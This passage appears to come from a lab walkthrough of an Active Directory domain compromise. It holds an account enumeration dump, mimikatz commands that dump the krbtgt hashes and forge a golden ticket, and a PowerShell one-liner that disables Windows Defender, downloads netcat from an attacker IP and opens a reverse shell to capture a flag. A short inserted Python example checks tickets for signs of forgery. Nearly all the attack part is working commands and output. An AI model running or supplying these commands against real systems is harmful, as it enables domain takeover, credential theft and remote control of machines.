iscriticalsystemobject : True
usnchanged             : 8197

logoncount                    : 0
iscriticalsystemobject        : True
description                   : Key Distribution Center Service Account
distinguishedname             : CN=krbtgt,CN=Users,DC=ops,DC=comply,DC=com
objectclass                   : {top, person, organizationalPerson, user}
name                          : krbtgt
showinadvancedviewonly        : True
objectsid                     : S-1-5-21-2032401531-514583578-4118054891-502
samaccountname                : krbtgt
admincount                    : 1
codepage                      : 0
samaccounttype                : USER_OBJECT
accountexpires                : NEVER
cn                            : krbtgt
whenchanged                   : 7/15/2020 8:58:48 PM
instancetype                  : 4
usncreated                    : 12300
objectguid                    : 387a313b-0a95-45b2-8e7a-c0a21ebdae6e
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata         : {7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname          : kadmin/changepw
memberof                      : CN=Denied RODC Password Replication Group,CN=Users,DC=ops,DC=comply,DC=com
lastlogon                     : 12/31/1600 4:00:00 PM
badpasswordtime               : 12/31/1600 4:00:00 PM
badpwdcount                   : 0
useraccountcontrol            : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated                   : 7/15/2020 8:43:38 PM
countrycode                   : 0
primarygroupid                : 513
pwdlastset                    : 7/15/2020 1:43:38 PM
msds-supportedencryptiontypes : 0
usnchanged                    : 13044

logoncount            : 16
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=Pete,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Pete
lastlogontimestamp    : 8/1/2022 2:07:06 AM
userprincipalname     : [email protected]
name                  : Pete
objectsid             : S-1-5-21-2032401531-514583578-4118054891-1104
samaccountname        : pete
admincount            : 1
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Pete
whenchanged           : 8/1/2022 9:07:06 AM
instancetype          : 4
usncreated            : 13078
objectguid            : 8340879d-f78e-48e3-95ad-4e8bb7882379
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 9:58:48 PM, 1/1/1601 12:00:00 AM}
givenname             : Pete
memberof              : CN=Domain Admins,CN=Users,DC=ops,DC=comply,DC=com
lastlogon             : 8/1/2022 2:27:46 AM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/15/2020 9:18:26 PM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 2:18:26 PM
usnchanged            : 69944

logoncount            : 4
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=Nina,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Nina
lastlogontimestamp    : 7/15/2020 11:49:19 PM
userprincipalname     : [email protected]
name                  : Nina
objectsid             : S-1-5-21-2032401531-514583578-4118054891-1109
samaccountname        : nina
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Nina
whenchanged           : 7/16/2020 6:49:19 AM
instancetype          : 4
usncreated            : 13717
objectguid            : 627efa6d-1a04-45fb-aea9-614aa0f6c786
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
givenname             : Nina
memberof              : CN=FileAdmin,OU=OpsGroups,DC=ops,DC=comply,DC=com
lastlogon             : 7/15/2020 11:51:58 PM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/16/2020 6:48:28 AM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 11:48:28 PM
usnchanged            : 13726

Get the krbtgt hash

PS C:\Users\Administrator\Desktop> .\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::lsa /inject /name:krbtgt
Domain : OPS / S-1-5-21-2032401531-514583578-4118054891

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 7c7865e6e30e54e8845aad091b0ff447
    LM   : 
  Hash NTLM: **7c7865e6e30e54e8845aad091b0ff447**
    ntlm- 0: 7c7865e6e30e54e8845aad091b0ff447
    lm  - 0: b3c43eb3ee288bab2606504b11e7fe3a

 * WDigest

 * Kerberos
    Default Salt : OPS.COMPLY.COMkrbtgt
    Credentials
      des_cbc_md5       : a2328f76b008b3e3

 * Kerberos-Newer-Keys
    Default Salt : OPS.COMPLY.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 5835db0b31ca0cedd2ffcde55be50e1ca2c7934cdf9e1105c8b4ecdc3a4301df
      aes128_hmac       (4096) : 85e4044712bbaf5e98c5c31e1d05812d
      des_cbc_md5       (4096) : a2328f76b008b3e3

 * NTLM-Strong-NTOWF
    Random Value : be0cca4f4c3aaec5e2ef0596e93f1da8

mimikatz(commandline) # exit
Bye!

Golden ticket:

PS C:\Users\Administrator\Desktop> **.\mimikatz.exe "kerberos::golden /user:Administrator /domain:ops.comply.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt" "exit"**
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:ops.comply.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:ops.comply.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt
User      : Administrator
Domain    : ops.comply.com (OPS)
SID       : S-1-5-21-2032401531-514583578-4118054891
User Id   : 500
Groups Id : *513 512 520 518 519 
Extra SIDs: S-1-5-21-1135011135-3178090508-3151492220-519 ; 
ServiceKey: 7c7865e6e30e54e8845aad091b0ff447 - rc4_hmac_nt      
Lifetime  : 8/1/2022 2:49:20 AM ; 7/29/2032 2:49:20 AM ; 7/29/2032 2:49:20 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ ops.comply.com' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

PS C:\Users\Administrator\Desktop> dir \\rdc02.comply.com\c$
dir \\rdc02.comply.com\c$

    Directory: \\rdc02.comply.com\c$

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        7/15/2020  12:48 PM                PerfLogs                                                              
d-r---        7/15/2020   5:44 PM                Program Files                                                         
d-----        7/15/2020   5:30 PM                Program Files (x86)                                                   
d-r---        7/15/2020   5:30 PM                Users                                                                 
d-----        9/21/2020   5:47 AM                Windows
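
A defender-side reading of the golden-ticket output above, as an added example that is not part of the original write-up: it checks a TGT metadata record for the three anomalies that output shows (a ten-year lifetime, an Enterprise Admins SID from a different domain in Extra SIDs, and an rc4_hmac service key although krbtgt holds AES keys). The record layout, field names and the 10-hour policy value are assumptions; the SIDs and timestamps are taken from the output above.

```python
from datetime import datetime, timedelta

# Assumption: the AD default "Maximum lifetime for user ticket" of 10 hours.
MAX_TGT_LIFETIME = timedelta(hours=10)
# Well-known RIDs of domain- and forest-wide privileged groups.
PRIVILEGED_RIDS = {"512": "Domain Admins", "518": "Schema Admins",
                   "519": "Enterprise Admins"}
RC4_HMAC, AES256_SHA1 = 23, 18  # Kerberos encryption type numbers

def ticket_findings(ticket, realm_sid, krbtgt_has_aes=True):
    """Return the reasons a TGT record looks forged; empty list if none."""
    findings = []
    lifetime = ticket["end"] - ticket["start"]
    if lifetime > MAX_TGT_LIFETIME:
        findings.append(f"lifetime of {lifetime.days} days exceeds ticket policy")
    for sid in ticket["extra_sids"]:
        domain_sid, _, rid = sid.rpartition("-")
        if domain_sid != realm_sid and rid in PRIVILEGED_RIDS:
            findings.append(f"{PRIVILEGED_RIDS[rid]} SID of another domain: {sid}")
    if ticket["etype"] == RC4_HMAC and krbtgt_has_aes:
        findings.append("RC4 ticket although krbtgt holds AES keys")
    return findings

OPS_SID = "S-1-5-21-2032401531-514583578-4118054891"  # issuing realm, from the page

# Record built from the mimikatz output above (field names are hypothetical).
FORGED = {
    "start": datetime(2022, 8, 1, 2, 49, 20),
    "end": datetime(2032, 7, 29, 2, 49, 20),
    "extra_sids": ["S-1-5-21-1135011135-3178090508-3151492220-519"],
    "etype": RC4_HMAC,
}
# Constructed contrast case: a ticket the KDC would normally issue.
NORMAL = {
    "start": datetime(2022, 8, 1, 2, 49, 20),
    "end": datetime(2022, 8, 1, 12, 49, 20),
    "extra_sids": [],
    "etype": AES256_SHA1,
}

if __name__ == "__main__":
    for name, rec in (("forged", FORGED), ("normal", NORMAL)):
        print(name, ticket_findings(rec, OPS_SID))
```

Each check is a heuristic: the lifetime threshold should match the domain's actual Kerberos policy, and the RC4 check only applies where AES keys exist for krbtgt.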

Reverse shell with nc:

PS C:\Users\Administrator\Desktop> Invoke-Command -computername rdc02.comply.com -scriptblock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose;iwr -uri http://192.168.49.64/nc.exe -o c:\windows\tasks\nc.exe;c:\windows\tasks\nc.exe 192.168.49.64 443 -e cmd.exe }
Invoke-Command -computername rdc02.comply.com -scriptblock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose;iwr -uri http://192.168.49.64/nc.exe -o c:\windows\tasks\nc.exe;c:\windows\tasks\nc.exe 192.168.49.64 443 -e cmd.exe }
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.49.64] from (UNKNOWN) [192.168.64.169] 63177
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.OPS\Documents>hostname
hostname
rdc02

C:\Users\Administrator.OPS\Documents>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.64.160
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.64.254

C:\Users\Administrator.OPS\Documents>whoami
whoami
ops\administrator

C:\Users\Administrator.OPS\Desktop>cd c:\Users\Administrator\Desktop\
cd c:\Users\Administrator\Desktop\

c:\Users\Administrator\Desktop>type proof.txt
type proof.txt
**b03dc83d19a4535dd27dec84910d8b3f**
c:\Users\Administrator\Desktop>